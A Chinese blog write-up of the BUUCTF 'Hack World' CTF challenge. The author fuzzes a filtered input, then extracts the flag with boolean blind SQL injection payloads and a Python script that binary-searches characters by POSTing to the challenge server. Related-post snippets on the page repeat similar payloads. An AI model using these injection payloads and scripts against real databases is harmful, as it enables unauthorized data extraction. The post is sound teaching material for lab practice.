【buuctf】hack world wp

最新推荐文章于 2024-06-23 15:52:24 发布
最新推荐文章于 2024-06-23 15:52:24 发布
阅读量332 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55185160/article/details/119728532
版权

打开网页我们可以得到表名和列名都为flag 在输入框内输入1得到

输入2得到

 

 输入3时

发现报错于是尝试注入 1 union select 1,2

 发现受限制我们进行一个fuzz测试

长度为460的都是被过滤的 看了大佬的方法发现这里运用sql三目运算 if(表达式1,表达式2,表达式3)如果表达式1正确,执行表达式2,否则执行表达式3

if(ascil(substr((select(flag)from(flag)),%d,1))>%d,1,2)''%(x,mid)

用大佬的脚本跑到得到flag

import requests
import time

url = "http://be7c3bbe-f847-4c30-bfbd-baa005a54773.node3.buuoj.cn/index.php"
payload = {
    "id" : ""
}
result = ""
for i in range(1,100):
    l = 33
    r =130
    mid = (l+r)>>1
    while(l<r):
        payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
        html = requests.post(url,data=payload)
        print(payload)
        if "Hello" in html.text:
            l = mid+1
        else:
            r = mid
        mid = (l+r)>>1
    if(chr(mid)==" "):
        break
    result = result + chr(mid)
    print(result)
print("flag: " ,result)

 

 

Bri9ht_pe@r1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
(未完成版)Hack World
m0_75178803的博客
04-13 88
Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试;输入字符时的boo提示,那这里就得考虑布尔注入。在cmd界面安装requests库的前提下。用python执行脚本得到flag。
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World-wp
居上
08-10 331
[CISCN2019 华北赛区 Day2 Web1]Hack World 知识点 fuzz python盲注脚本 过程 fuzz一哈 一个搜索框,搜索框输入1或2会返回结果,其他都返回bool(false)。过滤了union、and、or、空格等 贴上脚本: import requests url = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php" result = "" num = 0 # 用
BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World
最新发布
m0_74167420的博客
06-23 360
payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。4、因此可以尝试通过布尔盲注的方式来得到flag。
[CISCN2019 华北赛区 Day2 Web1]Hack World -wp
freerats的博客
06-27 264
可以在页面上看到提示,flag在flag表flag列里 在查询0,1,2时会获得不同的回显, 0回显:Error Occured When Fetch Result. 1:Hello, glzjin wants a girlfriend 2:Do you want to be my girlfriend? 初步判断0字段应该不存在,1,2存在 尝试输入or时发现被ban,我们可以fuzz一下 长为482的都是不允许的 可以发现select,from,where这些常用注入字符都可以使用 题目过滤了双引号,导
[CISCN2019 华北赛区 Day2 Web1]Hack World(排坑
weixin_45751765的博客
09-28 1440
0x00 前言 惭愧,好像是第一次做盲注题(之前肯定看过,不深入而已…) 直接看了wp进行复现了 根据特定环境适用的攻击手法,熟悉一下script编写 0x01 复现 贴一下源码方便后续理解 <?php $dbuser='root'; $dbpass='root'; function safe($sql){ #被过滤的内容 函数基本没过滤 $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','i
web buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_44214568的博客
03-20 1836
考点:盲注(布尔注入);异或的使用 1.输入1' 提示的是bool(错误),这里没有报错回显,只提示错误,其实就可以判断出是个布尔注入 2. 输入1' or '1=1'# 存在过滤,用bp抓包,fuzz进行爆破,看过滤了什么字符; (看回显,长度为482的都会提示sql注入,即被过滤的字符)这只能确定一部分,在实际操作中因为字符链接,字符本身都会产生新的过滤,注意一下 or的连接语句,空格等 3.根据提示 即从表flag的flag列内提取内容,根据前面的操作可知存在布尔注入,我
GitHack_githack_
10-03
githack dddd 用于git !
dsf.rar_hack
09-20
【标题】"dsf.rar_hack"提示我们这是一个与黑客技术相关的压缩文件,可能是某个黑客实验、工具集合或教程。"rar"是流行的压缩文件格式,通常用于存储多个文件在一个包里。 【描述】"swing hack just for fun"表明这...
Hack-Regular.ttf
05-17
Hack-Regular.ttf
Hack_Computer
02-14
## Hack_Computer ##这是我通用的16位计算机,其结果是创建基本逻辑门,然后使用它们构建ALU(算术和逻辑单元)并最终形成RAM芯片。 该计算机使用“ Harverd Architecture”(对“ Von Neumann Architecture”进行了...
buuctf-Hack World
m0_62094846的博客
02-21 484
很多都被过滤了,空格也是,回显信息只有1和2有,报错的信息也是一样的,用盲注试试。用if的盲注是可行的。
BUUCTF——Hack World
weixin_45864041的博客
12-03 1280
题目告诉我们表名为flag,列名为flag 所以值查询为select flag from flag 按照提示传入id=0 传入id=1 什么都不传 现在看来应该是布尔型盲注,而且过滤了一些东西 尝试传入1^1 传入1^0 直接构造payload 1^(ascii(substr((select flag from flag),0,1))=102) 传入后可以发现,空格被过滤了 所以换一下 1^(ascii(substr((select(flag)from(flag)),0,1))=102) .
buuctf [CISCN2019] hackworld
SopRomeo的博客
02-07 1748
过滤了很多sql字符,最终发现可以盲注,跟极客大挑战的fianlsql注入一样,这边告诉你表名和列名了 直接输入语句 1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1 盲注手去敲太费时间,结合finalsql的经验,写脚本,注意这是post请求 奉上卑微脚本(看到大哥写的脚本太狠了) import requests import ti...
BUUCTF[CISCN2019 华北赛区 Day2 Web1]Hack World(报错注入)
qq_44657899的博客
03-12 2174
这道题过滤了常用的语句,还过滤了空格和/**/,一番分析之下发现果然我这种菜鸡只能看wp了。 然后学会了一种新的思路 0^(ascii(substr((select(flag)from(flag)),1,1))=ascii('f')) 脚本: import requests import time url='http://76eeac1c-8521-4f23-83f5-9e41b5f7b2d4.n...
BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World
qq_60829702的博客
10-22 662
使用二分法就是快呀,大家可以运行这两个脚本比较一下,我刚开始是用第二个的,后面用了第一个。这两个就不是一个级别的,这里我编写二分法脚本的时候也出现了一点问题,然后看其他师傅的文章借鉴了一下。看到这里确实是可以的,但是当我们输入id=0的时候也会显示这个错误,所以我们就不需要使用异或了,直接就是布尔盲注就行了。按照正常的思路,就是找到注入点后就看能不能使其闭合了,但没办法过滤了太多了,我们使用bp看一下过滤了哪些东西。我这里有两个脚本一个二分法的,一个就是直接暴力比较的脚本,有需要可以自取。
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
qq_43618536的博客
07-03 520
BUUCTF的[CISCN2019 华北赛区 Day2 Web1]Hack World 1 盲注
buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
m_de_g的博客
04-22 685
【代码】buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World
bugkuctf web 部分wp(自己看得懂)
LJW_wenjingli7的博客
12-15 2497
1.本地管理员 进入网址,查源码,异常的一串n,拉进度条看 == 是base64,解出test123 ,像密码。 这种未知的系统一般要爆破,随便填账号密码,连接代理,打开bp 右键发到repeater,去掉cookie请求,用XXF伪造请求IP,(能考虑到管理员可能是admin,直接省略改名)改user=admin,发送即可 **XXF: X-Forwarded-For:(HTTP的请求端真实的IP) 如题中的:X-Forwarded-For:127.0.0.1 XFF注入..
使用HHVM与Hack提升PHP编程效率
"Hack和HHVM是Facebook开发的用于提高其Web服务器性能的两项新技术,旨在提升编程效率且不破坏现有应用程序。这本书由Facebook核心Hack和HHVM团队成员Owen Yamauchi撰写,提供了实践指南,教你如何使用这些经过实战...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值